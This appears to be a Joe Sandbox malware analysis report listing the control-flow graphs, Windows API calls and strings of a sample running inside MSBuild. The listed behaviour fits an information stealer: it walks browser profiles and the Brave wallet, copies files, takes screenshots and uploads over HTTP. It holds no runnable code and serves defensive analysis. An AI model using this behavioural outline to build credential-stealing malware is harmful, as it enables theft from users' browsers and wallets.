                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                          • String ID: "$"$"$($------$------$------$------$build_id$mode
                                                                                          • API String ID: 2237346945-1447386369
                                                                                          • Opcode ID: 0ad7276aa294dbd547a4d96f96a942a7d0334b21d4d2b34b5b54ff39ca66d9ac
                                                                                          • Instruction ID: d7c5970f0897ada52bebf96924e878e3ecce30d18c8aa08c600bdb313c44272c
                                                                                          • Opcode Fuzzy Hash: 0ad7276aa294dbd547a4d96f96a942a7d0334b21d4d2b34b5b54ff39ca66d9ac
                                                                                          • Instruction Fuzzy Hash: 51424EB190414DEADB11EBE1C956BEEBBB8AF18308F50017EE505B3582DA781B4CCB65
                                                                                          Function 004153F6 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 316filestringCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1466 4153f6-415469 _EH_prolog call 4181c0 wsprintfA FindFirstFileA memset * 2 1469 41581b-415835 call 401061 1466->1469 1470 41546f-415483 StrCmpCA 1466->1470 1471 415489-41549d StrCmpCA 1470->1471 1472 4157fa-41580c FindNextFileA 1470->1472 1471->1472 1475 4154a3-4154df wsprintfA StrCmpCA 1471->1475 1472->1470 1474 415812-415815 FindClose 1472->1474 1474->1469 1477 4154e1-4154f9 wsprintfA 1475->1477 1478 4154fb-41550a wsprintfA 1475->1478 1479 41550d-41553e memset lstrcat 1477->1479 1478->1479 1480 415561-41556b strtok_s 1479->1480 1481 415540-415551 1480->1481 1482 41556d-4155a1 memset lstrcat 1480->1482 1487 415785-41578b 1481->1487 1488 415557-415560 1481->1488 1483 4156e1-4156eb strtok_s 1482->1483 1484 4156f1 1483->1484 1485 4155a6-4155b6 PathMatchSpecA 1483->1485 1484->1487 1489 4156d7-4156e0 1485->1489 1490 4155bc-4156bb call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d DeleteFileA call 40fb4d CopyFileA call 40fb4d call 410f12 call 418360 1485->1490 1487->1472 1491 41578d-415799 1487->1491 1488->1480 1489->1483 1532 4156f6-415705 1490->1532 1533 4156bd-4156d2 call 40fb4d DeleteFileA call 40f98e 1490->1533 1491->1474 1494 41579b-4157a3 1491->1494 1494->1472 1496 4157a5-4157ef call 4010b1 call 4153f6 1494->1496 1504 4157f4 1496->1504 1504->1472 1535 415836-415841 call 40f98e 1532->1535 1536 41570b-41572e call 40f95a call 40618b 1532->1536 1533->1489 1535->1469 1545 415730-415775 call 40f923 call 4010b1 call 414437 call 40f98e 1536->1545 1546 41577a-415780 call 40f98e 1536->1546 1545->1546 1546->1487
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004153FB
                                                                                          • wsprintfA.USER32 ref: 00415421
                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                          • memset.MSVCRT ref: 0041544F
                                                                                          • memset.MSVCRT ref: 0041545D
                                                                                          • StrCmpCA.SHLWAPI(?,004267F4), ref: 0041547B
                                                                                          • StrCmpCA.SHLWAPI(?,004267F8), ref: 00415495
                                                                                          • wsprintfA.USER32 ref: 004154B9
                                                                                          • StrCmpCA.SHLWAPI(?,00426516), ref: 004154CA
                                                                                          • wsprintfA.USER32 ref: 004154F0
                                                                                          • wsprintfA.USER32 ref: 00415504
                                                                                          • memset.MSVCRT ref: 00415516
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                          • strtok_s.MSVCRT ref: 00415561
                                                                                          • memset.MSVCRT ref: 00415576
                                                                                          • lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                          • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004155AE
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                            • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,?,00000000,?,00426824,?,?,?,00426517), ref: 0041567B
                                                                                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00415693
                                                                                            • Part of subcall function 00410F12: CreateFileA.KERNEL32(004156A7,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,?,004156A7,00000000), ref: 00410F2D
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004156B0
                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,?,000003E8,00000000), ref: 004156C6
                                                                                          • strtok_s.MSVCRT ref: 004156E1
                                                                                          • FindNextFileA.KERNELBASE(000000FF,?), ref: 00415804
                                                                                          • FindClose.KERNEL32(000000FF), ref: 00415815
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$H_prologlstrcatlstrcpymemsetwsprintf$Find$Deletestrtok_s$CloseCopyCreateFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                          • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                          • API String ID: 2774496700-332874205
                                                                                          • Opcode ID: d20dc5bdacd583ed27b03aefafc9fd92c8039eee4d847269b8182252768ee144
                                                                                          • Instruction ID: ca9661dadf250ee48b6985f068276dcce33099c5ed12ff06a98e026076f1a7f9
                                                                                          • Opcode Fuzzy Hash: d20dc5bdacd583ed27b03aefafc9fd92c8039eee4d847269b8182252768ee144
                                                                                          • Instruction Fuzzy Hash: F2C160B1D0015DEEDF20EBE4DC45EDEBBBCAB08304F50406AF519A3191DB389A49CB65
                                                                                          Function 0040C679 Relevance: 48.2, APIs: 21, Strings: 6, Instructions: 924fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1555 40c679-40c72b _EH_prolog call 40f923 call 40fa28 call 40fa9c call 40f9e1 call 40f98e * 2 call 40f923 * 2 call 40fb4d FindFirstFileA 1574 40c772-40c778 1555->1574 1575 40c72d-40c76d call 40f98e * 3 call 401061 call 40f98e 1555->1575 1576 40c77a-40c78e StrCmpCA 1574->1576 1605 40d3d4-40d3f9 call 40f98e * 2 1575->1605 1578 40d374-40d386 FindNextFileA 1576->1578 1579 40c794-40c7a8 StrCmpCA 1576->1579 1578->1576 1583 40d38c-40d3d1 FindClose call 40f98e * 3 call 401061 call 40f98e 1578->1583 1579->1578 1581 40c7ae-40c83a call 40f997 call 40fa28 call 40fa9c * 2 call 40f9e1 call 40f98e * 3 1579->1581 1622 40c840-40c859 call 40fb4d StrCmpCA 1581->1622 1623 40c99f-40ca34 call 40fa9c * 4 call 40f9e1 call 40f98e * 3 1581->1623 1583->1605 1628 40c8ff-40c99a call 40fa9c * 4 call 40f9e1 call 40f98e * 3 1622->1628 1629 40c85f-40c8fa call 40fa9c * 4 call 40f9e1 call 40f98e * 3 1622->1629 1672 40ca3a-40ca5c call 40f98e call 40fb4d StrCmpCA 1623->1672 1628->1672 1629->1672 1681 40ca62-40ca76 StrCmpCA 1672->1681 1682 40cc7b-40cc90 StrCmpCA 1672->1682 1681->1682 1683 40ca7c-40cbf5 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 CopyFileA call 40f923 call 40fa9c * 2 call 40f9e1 call 40f98e * 2 call 40f95a call 40618b 1681->1683 1684 40cc92-40ccf5 call 4010b1 call 40f95a * 3 call 40c27b 1682->1684 1685 40cd05-40cd1a StrCmpCA 1682->1685 1883 40cc44-40cc76 call 40fb4d DeleteFileA call 40fb14 call 40fb4d call 40f98e * 2 1683->1883 1884 40cbf7-40cc3f call 40f95a call 4010b1 call 414437 call 40f98e 1683->1884 1745 40ccfa-40cd00 1684->1745 1688 40cd96-40cdb1 call 40f95a call 410cdd 1685->1688 1689 40cd1c-40cd33 call 40fb4d StrCmpCA 1685->1689 1714 40ce37-40ce4c StrCmpCA 1688->1714 1715 40cdb7-40cdba 1688->1715 1698 40d2e3-40d2ea 1689->1698 1699 40cd39-40cd3c 1689->1699 1706 40d364-40d36f call 40fb14 * 2 1698->1706 1707 40d2ec-40d359 call 40f95a * 2 call 40f923 call 4010b1 call 40c679 1698->1707 1699->1698 1703 40cd42-40cd94 call 4010b1 call 40f95a * 2 1699->1703 1756 40ce15-40ce27 call 40f95a call 406737 1703->1756 1706->1578 1771 40d35e 1707->1771 1721 40d0d0-40d0e5 StrCmpCA 1714->1721 1722 40ce52-40cf43 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 CopyFileA 1714->1722 1715->1698 1716 40cdc0-40ce12 call 4010b1 call 40f95a call 40f923 1715->1716 1716->1756 1721->1698 1726 40d0eb-40d1dc call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 CopyFileA 1721->1726 1836 40d027-40d040 call 40fb4d StrCmpCA 1722->1836 1837 40cf49-40d021 call 4010b1 call 40f95a * 3 call 406e2a call 4010b1 call 40f95a * 3 call 407893 1722->1837 1840 40d2c0-40d2d2 call 40fb4d DeleteFileA call 40fb14 1726->1840 1841 40d1e2-40d246 call 4010b1 call 40f95a * 3 call 4071c6 1726->1841 1745->1698 1777 40ce2c-40ce32 1756->1777 1771->1706 1777->1698 1849 40d0b1-40d0c3 call 40fb4d DeleteFileA call 40fb14 1836->1849 1850 40d042-40d0ab call 4010b1 call 40f95a * 3 call 407ec7 1836->1850 1837->1836 1863 40d2d7 1840->1863 1897 40d24b-40d2ba call 4010b1 call 40f95a * 3 call 4074e2 1841->1897 1873 40d0c8-40d0cb 1849->1873 1850->1849 1871 40d2da-40d2de call 40f98e 1863->1871 1871->1698 1873->1871 1883->1682 1884->1883 1897->1840
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040C67E
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00425B7B,00425B7A,00000000,?,00425CC4,?,?,00425B77,?,?,00000000), ref: 0040C71F
                                                                                          • StrCmpCA.SHLWAPI(?,00425CC8,?,?,00000000), ref: 0040C786
                                                                                          • StrCmpCA.SHLWAPI(?,00425CCC,?,?,00000000), ref: 0040C7A0
                                                                                          • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425CD0,?,?,00425B7E,?,?,00000000), ref: 0040C851
                                                                                            • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                          • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                          • API String ID: 3869166975-1816240570
                                                                                          • Opcode ID: 9804cbcb6549636e7edce159aa3ee5a2d29b2506f6b57e35bae4b86771403b22
                                                                                          • Instruction ID: 88dffd7cdbcf1f4ae3e67456db78224bf6b474b6b2878ab6084e2e33bf0d65cc
                                                                                          • Opcode Fuzzy Hash: 9804cbcb6549636e7edce159aa3ee5a2d29b2506f6b57e35bae4b86771403b22
                                                                                          • Instruction Fuzzy Hash: 67826070900288EADF25EBA5C955BDDBBB4AF19304F5040BEE449B32C2DB78174CCB66
                                                                                          Function 004162AF Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 227stringfileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004162B4
                                                                                          • wsprintfA.USER32 ref: 004162D4
                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                          • StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                                          • StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                                          • wsprintfA.USER32 ref: 00416346
                                                                                          • StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                                          • wsprintfA.USER32 ref: 00416374
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                            • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                            • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                            • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                            • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                            • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                          • wsprintfA.USER32 ref: 00416388
                                                                                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                          • lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                          • lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                                          • lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                          • lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                                          • lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004164DD
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0041655B
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                            • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                            • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                          • FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$lstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocCopyDeleteFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                                          • String ID: %s\%s$%s\%s$%s\*
                                                                                          • API String ID: 3378981913-445461498
                                                                                          • Opcode ID: f1e2c898751335988b89725b49f2b994cd233f31897e165e0f6e33926c86069b
                                                                                          • Instruction ID: 44fee943ad19fbeb295e67141fcee366af0812e97ca0ac8f0a151d0c2a205fa7
                                                                                          • Opcode Fuzzy Hash: f1e2c898751335988b89725b49f2b994cd233f31897e165e0f6e33926c86069b
                                                                                          • Instruction Fuzzy Hash: 97918C71900259ABDF10EBE4DD4ABDEBBBDAF09304F4040BAF505A3191DB389B48CB65
                                                                                          Function 004112FD Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 162windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00411302
                                                                                          • memset.MSVCRT ref: 00411328
                                                                                          • GetDesktopWindow.USER32 ref: 0041135E
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041136B
                                                                                          • GetDC.USER32(00000000), ref: 00411372
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 0041137C
                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041138D
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00411398
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004113B4
                                                                                          • GlobalFix.KERNEL32(?), ref: 00411412
                                                                                          • GlobalSize.KERNEL32(?), ref: 0041141E
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
                                                                                            • Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                            • Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,00425987,00425983,0042597B,00425977,00425976), ref: 004044A4
                                                                                            • Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                          • SelectObject.GDI32(00000000,?), ref: 00411498
                                                                                          • DeleteObject.GDI32(?), ref: 004114B3
                                                                                          • DeleteObject.GDI32(00000000), ref: 004114BA
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 004114C4
                                                                                          • CloseWindow.USER32(00000000), ref: 004114CB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                          • String ID: image/jpeg
                                                                                          • API String ID: 3067874393-3785015651
                                                                                          • Opcode ID: 3bdf46d3e9d7c0e78ba7912a53a363b2d7867d1b528b743ce995cd4dcfebb4b6
                                                                                          • Instruction ID: b777bc6b67979350ab37bc7b6ce454515ef26c15ee534ccd721ea0ab8c47e668
                                                                                          • Opcode Fuzzy Hash: 3bdf46d3e9d7c0e78ba7912a53a363b2d7867d1b528b743ce995cd4dcfebb4b6
                                                                                          • Instruction Fuzzy Hash: 385118B2D00218AFDF01AFE5DD499EEBFB9FF09714F10402AFA05E2160D7394A558BA5
                                                                                          Function 00401162 Relevance: 27.0, APIs: 13, Strings: 2, Instructions: 771fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00401167
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                          • StrCmpCA.SHLWAPI(?,00422378), ref: 004013CA
                                                                                          • StrCmpCA.SHLWAPI(?,0042237C), ref: 004013E4
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00422388,?,?,?,00422384,?,?,?,00422380,?,?), ref: 00401510
                                                                                            • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                            • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                          • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0042238C), ref: 004017EE
                                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042238C), ref: 00401832
                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,0042238C), ref: 00401841
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401767
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                            • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
